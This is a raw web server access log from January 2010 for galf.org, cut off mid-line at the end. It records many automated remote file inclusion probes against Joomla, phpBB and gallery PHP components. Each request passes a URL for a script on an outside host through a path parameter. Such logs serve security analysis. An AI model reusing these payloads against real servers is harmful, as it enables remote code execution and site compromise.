88.212.201.94 - - [04/Jan/2010:09:04:09 -0800] "GET /logs/access_090615.log/administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://www.studio-n.su/tmp/index1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
88.212.201.94 - - [04/Jan/2010:09:04:09 -0800] "GET /logs/administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://www.studio-n.su/tmp/index1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
88.212.201.94 - - [04/Jan/2010:09:04:09 -0800] "GET /administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://www.studio-n.su/tmp/index1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
88.212.201.94 - - [04/Jan/2010:09:04:09 -0800] "GET /logs/access_091221.log%20%20/administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://www.studio-n.su/tmp/index1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
88.212.201.94 - - [04/Jan/2010:09:04:21 -0800] "GET /logs/administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://www.studio-n.su/tmp/index1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
88.212.201.94 - - [04/Jan/2010:09:04:21 -0800] "GET /logs/access_090615.log/administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://www.studio-n.su/tmp/index1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
88.212.201.94 - - [04/Jan/2010:09:04:21 -0800] "GET /administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://www.studio-n.su/tmp/index1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
88.212.201.94 - - [04/Jan/2010:09:04:22 -0800] "GET /logs/administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://www.studio-n.su/tmp/index1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
88.212.201.94 - - [04/Jan/2010:09:04:22 -0800] "GET /administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://www.studio-n.su/tmp/index1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
88.212.201.94 - - [04/Jan/2010:09:04:22 -0800] "GET /logs/access_091221.log/administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://www.studio-n.su/tmp/index1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
88.212.201.94 - - [04/Jan/2010:09:04:56 -0800] "GET /logs/access_090928.log/administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://www.studio-n.su/tmp/index1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
88.212.201.94 - - [04/Jan/2010:09:05:32 -0800] "GET /logs/access_090928.log/administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://www.studio-n.su/tmp/index1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
62.67.244.151 - - [04/Jan/2010:09:06:37 -0800] "GET /logs/access_090907.log//admin/business_inc/saveserver.php?thisdir=http://www.vampires-fifa-liga.de/twomichael/tmp/release.txt?? HTTP/1.1" 404 - "-" "libwww-perl/5.65" "www.galf.org"
202.69.237.109 - - [04/Jan/2010:09:07:01 -0800] "GET /logs/access_090824.log%20%20//admin/business_inc/saveserver.php?thisdir=http://www.vampires-fifa-liga.de/twomichael/tmp/release.txt?? HTTP/1.1" 404 - "-" "libwww-perl/5.65" "www.galf.org"
202.69.237.109 - - [04/Jan/2010:09:08:07 -0800] "GET /logs/access_090907.log//admin/business_inc/saveserver.php?thisdir=http://www.vampires-fifa-liga.de/twomichael/tmp/release.txt?? HTTP/1.1" 404 - "-" "libwww-perl/5.65" "www.galf.org"
62.67.244.151 - - [04/Jan/2010:09:08:13 -0800] "GET /logs/access_090824.log%20%20//admin/business_inc/saveserver.php?thisdir=http://www.vampires-fifa-liga.de/twomichael/tmp/release.txt?? HTTP/1.1" 404 - "-" "libwww-perl/5.65" "www.galf.org"
170.210.192.78 - - [04/Jan/2010:09:09:03 -0800] "GET /joomla/index.php?option=com_restaurante&task=http://www.idei.by/web.idei.by/templates/1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
170.210.192.78 - - [04/Jan/2010:09:09:03 -0800] "GET /logs/joomla/index.php?option=com_restaurante&task=http://www.idei.by/web.idei.by/templates/1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
170.210.192.78 - - [04/Jan/2010:09:09:03 -0800] "GET /logs/access_090921.log%20%20/joomla/index.php?option=com_restaurante&task=http://www.idei.by/web.idei.by/templates/1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
170.210.192.78 - - [04/Jan/2010:09:09:03 -0800] "GET /logs/access_090907.log%20%20/joomla/index.php?option=com_restaurante&task=http://www.idei.by/web.idei.by/templates/1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
170.210.192.78 - - [04/Jan/2010:09:09:46 -0800] "GET /logs/access_091228.log//components/com_flyspray/startdown.php?file=http://www.idei.by/web.idei.by/templates/1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
202.69.237.109 - - [04/Jan/2010:09:09:48 -0800] "GET /logs/access_090907.log%20%20//admin/business_inc/saveserver.php?thisdir=http://www.vampires-fifa-liga.de/twomichael/tmp/release.txt?? HTTP/1.1" 404 - "-" "libwww-perl/5.65" "www.galf.org"
77.87.192.182 - - [04/Jan/2010:09:11:22 -0800] "GET /administrator/components/com_uhp/uhp_config.php?mosConfig_absolute_path=http://nuthome.net/bbs/data/manual/fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
77.87.192.182 - - [04/Jan/2010:09:11:22 -0800] "GET /logs/access_091221.log//administrator/components/com_uhp/uhp_config.php?mosConfig_absolute_path=http://nuthome.net/bbs/data/manual/fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
77.87.192.182 - - [04/Jan/2010:09:11:22 -0800] "GET /logs//administrator/components/com_uhp/uhp_config.php?mosConfig_absolute_path=http://nuthome.net/bbs/data/manual/fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
88.212.201.94 - - [04/Jan/2010:09:11:40 -0800] "GET /logs///skin/dognara_gallery//view.php?view[use_category]=1&dir=http://musicadelibreria.net/footer?? HTTP/1.0" 404 - "-" "Mozilla/5.0" "www.galf.org"
88.212.201.94 - - [04/Jan/2010:09:11:40 -0800] "GET /logs/access_090921.log///skin/dognara_gallery//view.php?view[use_category]=1&dir=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
88.212.201.94 - - [04/Jan/2010:09:11:44 -0800] "GET //skin/dognara_gallery//view.php?view[use_category]=1&dir=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
211.62.35.55 - - [04/Jan/2010:09:11:55 -0800] "GET /logs/administrator/components/com_webring/admin.webring.docs.php?component_dir=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
211.62.35.55 - - [04/Jan/2010:09:11:55 -0800] "GET /administrator/components/com_webring/admin.webring.docs.php?component_dir=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
211.62.35.55 - - [04/Jan/2010:09:11:55 -0800] "GET /logs/access.log/administrator/components/com_webring/admin.webring.docs.php?component_dir=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
202.69.237.109 - - [04/Jan/2010:09:12:19 -0800] "GET /logs/access_090824.log//admin/business_inc/saveserver.php?thisdir=http://www.vampires-fifa-liga.de/twomichael/tmp/release.txt?? HTTP/1.1" 404 - "-" "libwww-perl/5.65" "www.galf.org"
211.62.35.55 - - [04/Jan/2010:09:12:27 -0800] "GET /administrator/components/com_webring/admin.webring.docs.php?component_dir=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
211.62.35.55 - - [04/Jan/2010:09:12:27 -0800] "GET /logs/access.log%20%20/administrator/components/com_webring/admin.webring.docs.php?component_dir=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
211.62.35.55 - - [04/Jan/2010:09:12:27 -0800] "GET /logs/administrator/components/com_webring/admin.webring.docs.php?component_dir=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
61.47.7.71 - - [04/Jan/2010:09:12:48 -0800] "GET /logs/access_091116.log/?theme_path=http://190.12.77.105:83/fx29id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
61.47.7.71 - - [04/Jan/2010:09:12:48 -0800] "GET /?theme_path=http://190.12.77.105:83/fx29id1.txt? HTTP/1.1" 200 1048 "-" "Mozilla/5.0" "www.galf.org"
61.47.7.71 - - [04/Jan/2010:09:12:48 -0800] "GET /logs/?theme_path=http://190.12.77.105:83/fx29id1.txt? HTTP/1.1" 200 4942 "-" "Mozilla/5.0" "www.galf.org"
83.170.89.6 - - [04/Jan/2010:09:12:54 -0800] "GET /administrator/components/com_webring/admin.webring.docs.php?component_dir=http://photoworld.com.ua////zfxid1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
83.170.89.6 - - [04/Jan/2010:09:12:54 -0800] "GET /logs/administrator/components/com_webring/admin.webring.docs.php?component_dir=http://photoworld.com.ua////zfxid1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
83.170.89.6 - - [04/Jan/2010:09:12:54 -0800] "GET /logs/access.log%20%20/administrator/components/com_webring/admin.webring.docs.php?component_dir=http://photoworld.com.ua////zfxid1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
88.212.201.94 - - [04/Jan/2010:09:12:59 -0800] "GET //skin/dognara_gallery//view.php?view[use_category]=1&dir=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
88.212.201.94 - - [04/Jan/2010:09:12:59 -0800] "GET /logs///skin/dognara_gallery//view.php?view[use_category]=1&dir=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
83.170.89.6 - - [04/Jan/2010:09:13:03 -0800] "GET /logs/access_091221.log%20%20/administrator/components/com_webring/admin.webring.docs.php?component_dir=http://photoworld.com.ua////zfxid1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
88.212.201.94 - - [04/Jan/2010:09:13:04 -0800] "GET /logs/access_090921.log///skin/dognara_gallery//view.php?view[use_category]=1&dir=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
88.212.201.94 - - [04/Jan/2010:09:13:11 -0800] "GET //skin/dognara_gallery//view.php?view[use_category]=1&dir=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
88.212.201.94 - - [04/Jan/2010:09:13:11 -0800] "GET /logs/access_090921.log///skin/dognara_gallery//view.php?view[use_category]=1&dir=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
88.212.201.94 - - [04/Jan/2010:09:13:11 -0800] "GET /logs///skin/dognara_gallery//view.php?view[use_category]=1&dir=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
125.160.17.200 - - [04/Jan/2010:09:14:31 -0800] "GET /logs/sitemap.php?mosConfig_admin_path=http://phoviet.vn.net//backend/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
125.160.17.200 - - [04/Jan/2010:09:14:31 -0800] "GET /sitemap.php?mosConfig_admin_path=http://phoviet.vn.net//backend/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
125.160.17.200 - - [04/Jan/2010:09:14:31 -0800] "GET /logs/access_091221.log/sitemap.php?mosConfig_admin_path=http://phoviet.vn.net//backend/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
125.160.17.200 - - [04/Jan/2010:09:14:37 -0800] "GET /sitemap.php?mosConfig_admin_path=http://phoviet.vn.net//backend/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
125.160.17.200 - - [04/Jan/2010:09:14:41 -0800] "GET /logs/sitemap.php?mosConfig_admin_path=http://phoviet.vn.net//backend/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
125.160.17.200 - - [04/Jan/2010:09:14:41 -0800] "GET /logs/access_091221.log/sitemap.php?mosConfig_admin_path=http://phoviet.vn.net//backend/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
170.210.192.78 - - [04/Jan/2010:09:14:49 -0800] "GET /logs/access_090907.log/joomla/index.php?option=com_restaurante&task=http://www.idei.by/web.idei.by/templates/1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
170.210.192.78 - - [04/Jan/2010:09:14:49 -0800] "GET /logs/access_090921.log/joomla/index.php?option=com_restaurante&task=http://www.idei.by/web.idei.by/templates/1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
125.160.17.200 - - [04/Jan/2010:09:15:07 -0800] "GET /sitemap.php?mosConfig_admin_path=http://phoviet.vn.net//backend/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
125.160.17.200 - - [04/Jan/2010:09:15:07 -0800] "GET /logs/sitemap.php?mosConfig_admin_path=http://phoviet.vn.net//backend/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
125.160.17.200 - - [04/Jan/2010:09:15:07 -0800] "GET /logs/access_091221.log/sitemap.php?mosConfig_admin_path=http://phoviet.vn.net//backend/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
83.170.89.6 - - [04/Jan/2010:09:16:58 -0800] "GET /logs/access.log/administrator/components/com_webring/admin.webring.docs.php?component_dir=http://photoworld.com.ua////zfxid1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
83.170.89.6 - - [04/Jan/2010:09:17:10 -0800] "GET /logs/access_091221.log/administrator/components/com_webring/admin.webring.docs.php?component_dir=http://photoworld.com.ua////zfxid1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
61.47.7.71 - - [04/Jan/2010:09:17:31 -0800] "GET /logs/access_091116.log/?theme_path=http://190.12.77.105:83/fx29id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
61.47.7.71 - - [04/Jan/2010:09:17:31 -0800] "GET /logs/?theme_path=http://190.12.77.105:83/fx29id1.txt? HTTP/1.1" 200 4942 "-" "Mozilla/5.0" "www.galf.org"
61.47.7.71 - - [04/Jan/2010:09:17:31 -0800] "GET /?theme_path=http://190.12.77.105:83/fx29id1.txt? HTTP/1.1" 200 1048 "-" "Mozilla/5.0" "www.galf.org"
61.47.7.71 - - [04/Jan/2010:09:17:40 -0800] "GET /logs/access_090601.log/?theme_path=http://190.12.77.105:83/fx29id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
211.62.35.55 - - [04/Jan/2010:09:19:04 -0800] "GET /logs/access_091228.log/administrator/components/com_mgm/help.mgm.php?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
211.62.35.55 - - [04/Jan/2010:09:19:04 -0800] "GET /logs/administrator/components/com_mgm/help.mgm.php?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
211.62.35.55 - - [04/Jan/2010:09:19:04 -0800] "GET /administrator/components/com_mgm/help.mgm.php?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
211.62.35.55 - - [04/Jan/2010:09:19:11 -0800] "GET /logs/access_091109.log/administrator/components/com_mgm/help.mgm.php?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
67.19.194.26 - - [04/Jan/2010:09:20:04 -0800] "GET /logs/access_090720.log%20%20//include/bbs.lib.inc.php?site_path=http://nextime.t35.com/Oid1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
67.19.194.26 - - [04/Jan/2010:09:20:04 -0800] "GET /logs//include/bbs.lib.inc.php?site_path=http://nextime.t35.com/Oid1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
67.19.194.26 - - [04/Jan/2010:09:20:05 -0800] "GET /include/bbs.lib.inc.php?site_path=http://nextime.t35.com/Oid1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
67.19.194.26 - - [04/Jan/2010:09:20:07 -0800] "GET /include/bbs.lib.inc.php?site_path=http://nextime.t35.com/Oid1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
67.19.194.26 - - [04/Jan/2010:09:20:07 -0800] "GET /logs//include/bbs.lib.inc.php?site_path=http://nextime.t35.com/Oid1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
67.19.194.26 - - [04/Jan/2010:09:20:07 -0800] "GET /logs/access_090720.log%20%20//include/bbs.lib.inc.php?site_path=http://nextime.t35.com/Oid1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
202.131.226.52 - - [04/Jan/2010:09:21:03 -0800] "GET /logs/access_090615.log/mygallerybrowser.php?myPath=http://www.biasy.net//modules/news_afp/1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
202.131.226.52 - - [04/Jan/2010:09:21:03 -0800] "GET /logs/mygallerybrowser.php?myPath=http://www.biasy.net//modules/news_afp/1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
202.131.226.52 - - [04/Jan/2010:09:21:03 -0800] "GET /mygallerybrowser.php?myPath=http://www.biasy.net//modules/news_afp/1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
202.131.226.52 - - [04/Jan/2010:09:21:09 -0800] "GET /logs/mygallerybrowser.php?myPath=http://www.biasy.net//modules/news_afp/1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
202.131.226.52 - - [04/Jan/2010:09:21:09 -0800] "GET /logs/access_090615.log%20%20/mygallerybrowser.php?myPath=http://www.biasy.net//modules/news_afp/1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
202.131.226.52 - - [04/Jan/2010:09:21:09 -0800] "GET /mygallerybrowser.php?myPath=http://www.biasy.net//modules/news_afp/1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
163.152.219.201 - - [04/Jan/2010:09:21:13 -0800] "GET /logs////config[search_disp]=true&include_dir=http://www.idei.by/web.idei.by/templates/1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
163.152.219.201 - - [04/Jan/2010:09:21:13 -0800] "GET /logs/access_090720.log%20%20////config[search_disp]=true&include_dir=http://www.idei.by/web.idei.by/templates/1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
163.152.219.201 - - [04/Jan/2010:09:21:13 -0800] "GET /logs/access_090720.log%20%20////config[search_disp]=true&include_dir=http://www.idei.by/web.idei.by/templates/1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
163.152.219.201 - - [04/Jan/2010:09:21:13 -0800] "GET ///config[search_disp]=true&include_dir=http://www.idei.by/web.idei.by/templates/1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
163.152.219.201 - - [04/Jan/2010:09:21:13 -0800] "GET /logs////config[search_disp]=true&include_dir=http://www.idei.by/web.idei.by/templates/1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
163.152.219.201 - - [04/Jan/2010:09:21:13 -0800] "GET ///config[search_disp]=true&include_dir=http://www.idei.by/web.idei.by/templates/1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
202.131.226.52 - - [04/Jan/2010:09:21:25 -0800] "GET /logs/access_090601.log%20%20/mygallerybrowser.php?myPath=http://www.biasy.net//modules/news_afp/1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
202.131.226.52 - - [04/Jan/2010:09:21:38 -0800] "GET /mygallerybrowser.php?myPath=http://www.biasy.net//modules/news_afp/1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
202.131.226.52 - - [04/Jan/2010:09:21:38 -0800] "GET /logs/access_090615.log/mygallerybrowser.php?myPath=http://www.biasy.net//modules/news_afp/1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
202.131.226.52 - - [04/Jan/2010:09:21:38 -0800] "GET /logs/mygallerybrowser.php?myPath=http://www.biasy.net//modules/news_afp/1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
125.160.17.200 - - [04/Jan/2010:09:21:46 -0800] "GET /logs/access_091221.log%20%20/sitemap.php?mosConfig_admin_path=http://phoviet.vn.net//backend/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
211.62.35.55 - - [04/Jan/2010:09:22:44 -0800] "GET /logs/access_091228.log%20%20/administrator/components/com_mgm/help.mgm.php?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
125.160.17.200 - - [04/Jan/2010:09:22:52 -0800] "GET /logs/access_091228.log%20%20/sitemap.php?mosConfig_admin_path=http://phoviet.vn.net//backend/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
125.160.17.200 - - [04/Jan/2010:09:22:53 -0800] "GET /logs/access_091221.log%20%20/sitemap.php?mosConfig_admin_path=http://phoviet.vn.net//backend/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
125.160.17.200 - - [04/Jan/2010:09:23:07 -0800] "GET /logs/access_091221.log%20%20/sitemap.php?mosConfig_admin_path=http://phoviet.vn.net//backend/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
200.93.147.154 - - [04/Jan/2010:09:23:50 -0800] "GET /logs/access_090921.log//skin/gallery/setup.php?dir=http://bagoessss.fileave.com/aa.txt%20? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
200.93.147.154 - - [04/Jan/2010:09:23:50 -0800] "GET /skin/gallery/setup.php?dir=http://bagoessss.fileave.com/aa.txt%20? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
200.93.147.154 - - [04/Jan/2010:09:23:50 -0800] "GET /logs//skin/gallery/setup.php?dir=http://bagoessss.fileave.com/aa.txt%20? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
200.93.147.154 - - [04/Jan/2010:09:24:07 -0800] "GET /skin/gallery/setup.php?dir=http://bagoessss.fileave.com/aa.txt%20? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
200.93.147.154 - - [04/Jan/2010:09:24:07 -0800] "GET /logs//skin/gallery/setup.php?dir=http://bagoessss.fileave.com/aa.txt%20? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
125.160.17.200 - - [04/Jan/2010:09:24:14 -0800] "GET /logs/access_091228.log%20%20/sitemap.php?mosConfig_admin_path=http://phoviet.vn.net//backend/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
200.93.147.154 - - [04/Jan/2010:09:24:15 -0800] "GET /logs/access_090921.log//skin/gallery/setup.php?dir=http://bagoessss.fileave.com/aa.txt%20? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
125.160.17.200 - - [04/Jan/2010:09:24:24 -0800] "GET /logs/access_091228.log%20%20/sitemap.php?mosConfig_admin_path=http://phoviet.vn.net//backend/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
67.195.37.161 - - [04/Jan/2010:09:24:37 -0800] "GET /?M=A HTTP/1.0" 200 1032 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "www.galf.org"
163.152.219.201 - - [04/Jan/2010:09:27:46 -0800] "GET /logs/access_090713.log%20%20////////////////////?_SERVER[DOCUMENT_ROOT]=http://www.hyonsvc.co.kr//bbs//upload/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
163.152.219.201 - - [04/Jan/2010:09:27:46 -0800] "GET ///////////////////?_SERVER[DOCUMENT_ROOT]=http://www.hyonsvc.co.kr//bbs//upload/id1.txt? HTTP/1.1" 200 1065 "-" "Mozilla/5.0" "www.galf.org"
163.152.219.201 - - [04/Jan/2010:09:27:47 -0800] "GET /logs////////////////////?_SERVER[DOCUMENT_ROOT]=http://www.hyonsvc.co.kr//bbs//upload/id1.txt? HTTP/1.1" 200 4965 "-" "Mozilla/5.0" "www.galf.org"
163.152.219.201 - - [04/Jan/2010:09:27:58 -0800] "GET ///////////////////?_SERVER[DOCUMENT_ROOT]=http://www.hyonsvc.co.kr//bbs//upload/id1.txt? HTTP/1.1" 200 1065 "-" "Mozilla/5.0" "www.galf.org"
163.152.219.201 - - [04/Jan/2010:09:27:58 -0800] "GET /logs/access_090713.log%20%20////////////////////?_SERVER[DOCUMENT_ROOT]=http://www.hyonsvc.co.kr//bbs//upload/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
163.152.219.201 - - [04/Jan/2010:09:27:58 -0800] "GET /logs////////////////////?_SERVER[DOCUMENT_ROOT]=http://www.hyonsvc.co.kr//bbs//upload/id1.txt? HTTP/1.1" 200 4965 "-" "Mozilla/5.0" "www.galf.org"
74.200.89.25 - - [04/Jan/2010:09:30:03 -0800] "GET /modules/Forums/admin/admin_db_utilities.php?phpbb_root_path=http://www.gk-rus.ru/images/laknat/.id1?? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "galf.org"
74.200.89.25 - - [04/Jan/2010:09:31:20 -0800] "GET /logs//modules/Forums/admin/admin_db_utilities.php?phpbb_root_path=http://www.gk-rus.ru/images/laknat/.id1?? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "galf.org"
163.152.219.201 - - [04/Jan/2010:09:34:36 -0800] "GET /logs////////////////////?_SERVER[DOCUMENT_ROOT]=http://www.idei.by/web.idei.by/templates/1.txt?? HTTP/1.1" 200 4965 "-" "Mozilla/5.0" "www.galf.org"
163.152.219.201 - - [04/Jan/2010:09:34:36 -0800] "GET ///////////////////?_SERVER[DOCUMENT_ROOT]=http://www.idei.by/web.idei.by/templates/1.txt?? HTTP/1.0" 200 1049 "-" "Mozilla/5.0" "www.galf.org"
163.152.219.201 - - [04/Jan/2010:09:34:36 -0800] "GET /logs/access_091116.log%20%20////////////////////?_SERVER[DOCUMENT_ROOT]=http://www.idei.by/web.idei.by/templates/1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
163.152.219.201 - - [04/Jan/2010:09:34:37 -0800] "GET ///////////////////?_SERVER[DOCUMENT_ROOT]=http://www.idei.by/web.idei.by/templates/1.txt?? HTTP/1.1" 200 1065 "-" "Mozilla/5.0" "www.galf.org"
163.152.219.201 - - [04/Jan/2010:09:34:37 -0800] "GET /logs////////////////////?_SERVER[DOCUMENT_ROOT]=http://www.idei.by/web.idei.by/templates/1.txt?? HTTP/1.1" 200 4965 "-" "Mozilla/5.0" "www.galf.org"
163.152.219.201 - - [04/Jan/2010:09:34:37 -0800] "GET /logs/access_091116.log%20%20////////////////////?_SERVER[DOCUMENT_ROOT]=http://www.idei.by/web.idei.by/templates/1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
77.221.130.13 - - [04/Jan/2010:09:35:16 -0800] "GET /logs/access_090810.log//index.php?option=com_juser&Itemid=&mosConfig_absolute_path=http://paroleproibite.com/administrator/components/com_settings/image1.jpg??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
77.221.130.13 - - [04/Jan/2010:09:35:16 -0800] "GET /index.php?opt